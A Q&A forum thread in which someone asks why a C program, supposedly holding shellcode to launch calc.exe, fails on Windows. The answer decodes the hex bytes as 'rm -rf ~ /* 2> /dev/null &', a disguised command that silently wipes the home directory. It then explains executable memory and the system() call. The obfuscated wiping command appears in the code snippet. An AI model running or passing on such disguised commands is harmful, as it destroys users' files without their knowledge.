I have a following program written in c:
char code[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20"
"\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65"
"\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}
I compile it to .exe using shellnoob, but when I try to launch it in Windows 7 (32bit), an empty cmd window pops up and nothing happens. Could anyone please give me a hand? (The shellcode should spawn calc.exe.)
This string decodes to rm -rf ~ /* 2> /dev/null &, a shell command which would silently delete all files in your home directory (and all files in your computer given root access), on a UNIX/Linux shell. It would not work on Windows because it uses a different language for the shell.
To execute a shell command from C, the system() function can be used: http://en.cppreference.com/w/c/program/system. On windows it must use the cmd.exe shell language. system("calc") should launch calc.exe.
A "shellcode" in the sense of machine code instructions that should be executed can be called +/- like in this code, but the memory needs to be marked as executable first. (By default the OS does not allow to execute memory, for security reasons obviously). On Windows executable memory can be allocated using VirtualAllocEx for example. See How to generate and run native code dynamically? .
